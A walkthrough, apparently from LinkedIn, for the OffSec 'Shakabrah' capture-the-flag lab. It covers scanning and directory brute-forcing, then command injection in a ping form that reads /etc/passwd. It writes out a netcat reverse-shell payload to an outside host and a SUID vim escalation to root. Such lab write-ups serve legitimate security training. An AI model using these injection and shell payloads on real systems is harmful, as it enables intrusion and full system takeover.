Shakabrah Walkthrough OffSec

Shakabrah Walkthrough OffSec

In this walkthrough, I'll take you through the steps to tackle the "Shakabrah" box from OffSec. This concise guide covers the essential stages from reconnaissance to privilege escalation, providing a clear path to capturing the flags.


Rutscan: Identify open ports and services.

rustscan -a 192.168.158.86 -- -A         


HTTP Service: Explore the website manually.

Directory Bruteforcing: Discover hidden directories

gobuster dir -u https://192.168.158.86  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt        

From here, we can attempt to gain RCE by exploring the interface's capabilities. Instead of fuzzing to discover which commands we can execute—though that is a valuable exercise on its own—we can manually investigate. Specifically, we should determine if it allows command chaining.

ping 192.168.158.86;

ping 192.168.158.86;cat /etc/passwd




Now we will try to get RCE using this command injection vulnerability.


Payloads reverse shell.

 192.168.158.86;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.232 80 >/tmp/f        

We get our shell back and we now have access as www-dat.

we will use this shell from https://www.revshells.com/

Change the directory to /home/dylan, where you'll find a file named local.txt. Use the cat command to read the file and obtain your first flag.


Privilege Escalation:

find / -type f -perm -u=s  2>/dev/null        

Here, it shows that vim.basic has the SUID bit set. By checking GTFObins


: we find several exploitation methods. Here is the one I used:

run this command /usr/bin/vim.basic

:py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")
xterm        


cd /root here you have proof.txt now simply cat proof.txt to get your root flag




Great article! Very insightful for both beginners and experienced pen testers. Thanks for sharing! ?? #CyberSecurity #PenTesting #CTF

要查看或添加评论,请登录

Santosh Kumar的更多文章

  • Offensive Security So_Simple CTF Walkthrough

    Offensive Security So_Simple CTF Walkthrough

    Vrijanandan Kumar SANTOSH KUSHWAHA We scan the site with nmap. This shows two open port.

    1 条评论
  • CyberSploit1 | OffSec Writeup

    CyberSploit1 | OffSec Writeup

    Cybersploit-1 is a popular lab from Offensive Security (OffSec) designed to help users improve their penetration…

  • Different CTF from TryHackMe

    Different CTF from TryHackMe

    A Hard THM Challenge. Steganography, Database Handling, FTP, WordPress CMS, and Brute-Forcing.

  • TryHackMe- Kenobi-Walkthrough

    TryHackMe- Kenobi-Walkthrough

    SANTOSH KUSHWAHA Vrijanandan Kumar The "Kenobi" room on TryHackMe is an engaging challenge that guides you through the…

  • Wonderland -TryHackme Walkthrough

    Wonderland -TryHackme Walkthrough

    /SANTOSH KUSHWAHA Wonderland CTF link: TryHackMe | Wonderland The Wonderland challenge on TryHackMe is a cybersecurity…

  • Library - TryHackMe Walkthrough

    Library - TryHackMe Walkthrough

    Scan the machine:' We first find the list of services that are running on the machine. We use the below Rustscan…

  • Vulnversity — Walkthrough Tryhackme

    Vulnversity — Walkthrough Tryhackme

    Introduction "Vulnversity" is an introductory level room on TryHackMe that covers various penetration testing…

  • Poster TryHacMe Walkthrough

    Poster TryHacMe Walkthrough

    SANTOSH KUSHWAHA The "Poster" room focuses on web application security, specifically SQL injection, directory…

    1 条评论
  • Seppuku offsec Walkthrough

    Seppuku offsec Walkthrough

    SANTOSH KUMAR The Seppuku Offsec lab is a virtual penetration testing environment available on Vulnhub, designed to…

  • TryHackMe- Mr. Robot Walkthrough

    TryHackMe- Mr. Robot Walkthrough

    This Room Linux Basic: TryHackMe | Mr Robot CTF Reconnaissance I started by scanning the ports with Rustscan. We…

社区洞察